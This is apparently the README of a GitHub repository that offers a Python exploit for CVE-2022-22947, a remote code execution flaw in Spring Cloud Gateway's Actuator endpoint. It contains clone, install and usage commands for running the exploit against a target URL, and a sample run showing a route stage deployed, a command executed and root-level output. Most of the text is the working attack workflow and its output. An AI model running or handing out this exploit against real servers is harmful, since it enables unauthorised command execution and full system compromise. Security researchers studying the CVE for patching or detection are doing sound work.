
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

Primary LanguagePython

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)

CVE: CVE-2022-22947
Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.


git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'

    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)



